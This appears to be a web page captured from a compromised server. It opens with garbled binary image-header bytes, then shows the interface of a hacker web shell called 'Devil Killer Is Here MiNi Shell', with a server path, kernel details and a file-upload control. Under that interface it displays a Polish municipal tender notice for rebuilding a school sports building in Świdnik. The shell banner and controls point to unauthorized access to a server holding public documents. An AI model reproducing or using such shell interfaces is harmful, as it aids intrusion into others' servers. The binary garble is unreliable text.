JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220510/0015155301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa segmentu sportowego w budynku Szkoły Podstawowej nr 5<br/>przy ul. Jarzębinowej 6 w Świdniku.” - (wydatki finansowane ze środków<br/>Funduszu Rozwoju Kultury Fizycznej 2020-2023) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Świdnik</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019359</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stanisława Wyspiańskiego 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świdnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampub@e-swidnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://umswidnik.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa segmentu sportowego w budynku Szkoły Podstawowej nr 5<br/>przy ul. Jarzębinowej 6 w Świdniku.” - (wydatki finansowane ze środków<br/>Funduszu Rozwoju Kultury Fizycznej 2020-2023) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c102946a-d052-11ec-9ed6-82024ae9c4d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00151553</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039777/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 Przebudowa segmentu sportowego w budynku Szkoły Podstawowej nr 5 przy ul. Jarzębinowej 6 w Świdniku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://umswidnik.bip.lubelskie.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu komunikacja<br/>między Zamawiającym a Wykonawcami odbywa się przy użyciu mini Portalu,który dostępny jest pod<br/>adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod<br/>adresem:https://epuap.gov.pl/wps/portal (dane konta zamawiającego na ePUAP -<br/>odbiorca:UrządMiasta Świdnik,adres skrytki ePUAP: /umswidnik/SkrytkaESP ) oraz poczty<br/>elektronicznej (z wyjątkiem składania ofert), na adres zampub@e-swidnik.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej:1.Wykonawca<br/>zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,musi posiadać konto<br/>na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy:<br/>„Formularz do złożenia, zmiany, wycofania oferty lub wniosku”<br/>oraz do „Formularza dokomunikacji”.2. Wymagania techniczne i organizacyjne wysyłania i<br/>odbieraniadokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu<br/>miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji<br/>publicznej(ePUAP).3.Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>formularzy:„Formularz złożenia, zmiany,wycofania oferty lub wniosku” i „Formularza do komunikacji”<br/>wynosi150MB. 4. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów<br/>elektronicznych,oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych<br/>informacji przyjmuje się datę ich przekazania na ePUAP. 5. W postępowaniu o udzielenie zamówienia<br/>komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanieoświadczeń,wniosków,zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za<br/>pośrednictwem dedykowanego ormularza:„Formularz do komunikacji” dostępnego na ePUAP oraz<br/>udostępnionego przez mini Portal. We wszelkiej korespondencji związanej z niniejszym<br/>postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia BZP. 7. Zamawiający<br/>może również komunikować się z Wykonawcami za pomocą poczty<br/>elektronicznej,email:zampub@eswidnik.pl 8.Dokumenty elektroniczne, składane są przez Wykonawcę<br/>za pośrednictwem„Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również<br/>możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w<br/>pkt 7adres email (nie<br/>dotyczy składania ofert). Sposób sporządzenia dokumentów elektronicznych musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu<br/>MinistraRozwoju, Pracy i Technologii z dnia23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art.13 ogólnego rozporządzenia o<br/>ochronie danych osobowych z dnia 27 kwietnia 2016r. (Dz.Urz. UE L 119 z 04.05.2016r. (RODO)<br/>dotycząca osób fizycznych, których dane osobowe pozyskał Zamawiający, w<br/>szczególności:wykonawcy będącego osobą fizyczną, wykonawcy będącego osobą fizyczna<br/>prowadzącą jednoosobową działalność gospodarczą, pełnomocnika wykonawcy będącego osobą<br/>fizyczna, członka<br/>organu zarządzającego wykonawcy, będącego osobą fizyczną, osoby fizycznej skierowanej do<br/>przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego: Zgodnie z art.<br/>13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r.<br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,informujemy,<br/>że:1)administratorem Pani/Pana danych osobowych jest Gmina Miejska Świdnik z siedzibą w<br/>Świdniku, ul.Stanisława Wyspiańskiego 27, 2) z inspektorem ochrony danych osobowych w Gminie<br/>Miejskiej Świdnik można kontaktować się poprzez e-mail: iod@e-swidnik.pl, 3) Pani/Pana dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie niniejszego zamówienia publicznego w trybie przetargu<br/>nieograniczonego,4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia<br/>29 stycznia 2004 r. – Prawo zamówień publicznych (t.j.Dz. U. z 2021 r. poz. 1129 z późn. zm.), dalej<br/>„ustawa Pzp”; 5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy<br/>Pzp,przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas<br/>trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;6)<br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp; 7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosowanie do art. 22 RODO;8) posiada Pani/Pan:-na podstawie art. 15RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; - na podstawie art. 16<br/>RODOprawo do sprostowania Pani/Pana danych osobowych ;- na podstawie art. 18 RODO prawo<br/>żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ;9) prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana<br/>dotyczących narusza<br/>przepisy RODO; 10) nie przysługuje Pani/Panu:  w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo<br/>do usunięcia danych osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych,gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WIZP-Z 271.13.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> sportowego w budynku Szkoły Podstawowej nr 5 przy ul. Jarzębinowej 6 w Świdniku”.<br/>Przebudowa i rozbudowa budynku Szkoły Podstawowej nr 5, wraz z przebudową instalacji<br/>wewnętrznych: wentylacji mechanicznej oraz przebudową instalacji wewnętrznych poza<br/>obrysem budynku: kanalizacji deszczowej i energii elektrycznej na działce nr ewid. 1833 w<br/>Świdniku (wydatki finansowane ze środków Funduszu Rozwoju Kultury Fizycznej) (2020-2023)<br/>3.2 Parametry budynku (w zakresie opracowania)<br/>Wysokość budynku - 13,14 m<br/>(mierzona od poziomu terenu do kalenicy)<br/>Szerokość budynku - 48,94 m<br/>Długość budynku - 26,83m<br/>Powierzchnia zabudowy - 1085,13 m2<br/>Powierzchnia całkowita - 3249 m2<br/>Powierzchnia użytkowa (w zakresie opracowania) - 1959,64 m2<br/>Kubatura - 12 277 m33.3 Przedmiot zamówienia przewiduje wykonanie:<br/>3.3.1 Przebudowa budynku szkoły – segment “E”;<br/>a) Powierzchnia istniejącej zabudowy objętej opracowaniem: 1 047,13 m²<br/>b) Powierzchnia zakresu : 3 654,91 m²<br/> Rozbudowa budynku szkoły – o klatkę schodową i magazyn; 38,00 m²<br/> Przebudowa instalacji wewnetrznych – w tym wentylacji mechanicznej;<br/> Przebudowa instalacji wewnętrznych poza obrysem budynku – kanalizacja deszczowa, energia<br/>elektryczna;<br/>3.3.2 Przebudowa pochylni dla niepełnosprawnych;<br/>a) Powierzchnia schodów i pochyln: 51,74 m²<br/>3.3.3 Wymiana utwardzenia terenu;<br/>a) Nawierzchnia utwardzona z kostki brukowej (wymiana nawierzchni ist.): 179,45 m²<br/>b) Opaska z kostki brukowej wokół budynku (wymiana nawierzchni ist.): 43,21 m²<br/>3.4 Szczegółowy opis przedmiotu zamówienia znajduje się w dokumentacji projektowej i<br/>szczegółowych specyfikacjach technicznych wykonania i odbioru robót (załącznik nr 7A,7B.7C<br/>do SWZ).<br/>3.5 Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentacji projektowej lub<br/>SSTWiOR, a więc<br/>w dokumentach opisujących przedmiot zamówienia, zawarto odniesienie do norm, ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w<br/>art. 101 ust. 1 pkt 2 i ust. 3 Pzp a takim odniesieniom nie towarzyszyło wyrażenie „lub<br/>równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej<br/>normie, ocenie technicznej, specyfikacji technicznej, systemie referencji technicznych. W<br/>związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, specyfikacji<br/>technicznej, systemowi referencji technicznych występującym w opisie przedmiotu zamówienia<br/>towarzyszą wyrazy „lub równoważne&#34;. Zgodnie z art. 101 ust. 5 Pzp wykonawca, który powołuje<br/>się na rozwiązania równoważne opisywanym w tych dokumentach, jest obowiązany udowodnić,<br/>poprzez dołączenie do oferty stosownych przedmiotowych środków dowodowych, o których<br/>mowa w art. 104–107 Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają<br/>wymagania określone w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie<br/>stosować następujące kryteria oceny ofert: cena - 60%, okres gwarancji i rękojmi - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a) Wykonawca spełni warunek, jeżeli posiada doświadczenie niezbędne do wykonania<br/>przedmiotu zamówienia, tj. udokumentuje należyte wykonanie w okresie ostatnich pięciu lat<br/>przed upływem terminu składania ofert, co najmniej dwóch zamówień na roboty budowlane<br/>obejmujące minimum 2 roboty budowlane polegające na przebudowie,budowie lub remoncie<br/>budynku wraz z instalacjami wewnętrznymi, na kwotę min. 1 000 000,00 zł każda.<br/>Uwaga: w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum) warunek zostanie uznany za spełniony, jeżeli co najmniej jeden ze wspólników<br/>konsorcjum samodzielnie posiada wymagane doświadczenie (nie dopuszcza się sumowania<br/>potencjału wspólników w zakresie doświadczenia). Podobnie w przypadku powoływania się na<br/>zasoby podmiotu trzeciego w celu spełnienia warunków udziału w postępowaniu (w zakresie<br/>doświadczenia), podmiot ten musi samodzielnie posiadać doświadczenie opisane powyżej.<br/>b) Wykonawca spełni warunek jeżeli dysponuje osobami zdolnymi do wykonania zamówienia, wtym co najmniej następującymi osobami:<br/> osobą, która będzie pełniła funkcję kierownika budowy, posiadającą uprawnienia do kierowania<br/>robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz posiadającą co najmniej<br/>3-letnie doświadczenie zawodowe w kierowaniu robotami w posiadanej specjalności, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu:<br/>1) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art.109 ust.1 pkt 1 Pzp, wystawionego nie wcześniej<br/>niż 3 miesiące przed jego złożeniem, a wprzypadku zalegania z opłacaniem podatków lub opłat wraz z<br/>zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków odopuszczenie do udziału wpostępowaniu albo przed upływem<br/>terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz zodsetkami<br/>lub grzywnami lub zawarł wiążące porozumienie wsprawie spłat tych należności;<br/>2) zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecz-nych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem<br/>składek na ubezpieczenia społeczne i zdrowotne, w zakresie art.109 ust.1 pkt1 Pzp, wystawione nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający<br/>żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania<br/>wniosków o dopuszczenie do udziału wpostępowaniu albo przed upływem terminu składania ofert<br/>wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie wsprawie spłat tych należności,<br/>3) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art.109 ust. 1 pkt 4 Pzp, sporządzone nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">18.2.1 Wykaz podmiotowych środków dowodowych na potwierdzenie<br/>spełniania warunków udziału w postepowaniu:1) wykaz robót budowlanych, zgodny ze wzorem<br/>zamieszczonym w załączniku nr 4 do SWZ, wykonanych nie wcześniej niż w okresie ostatnich 5 lat od<br/>dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w<br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty imiejsca wykonania oraz podmiotów, na rzecz<br/>których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te 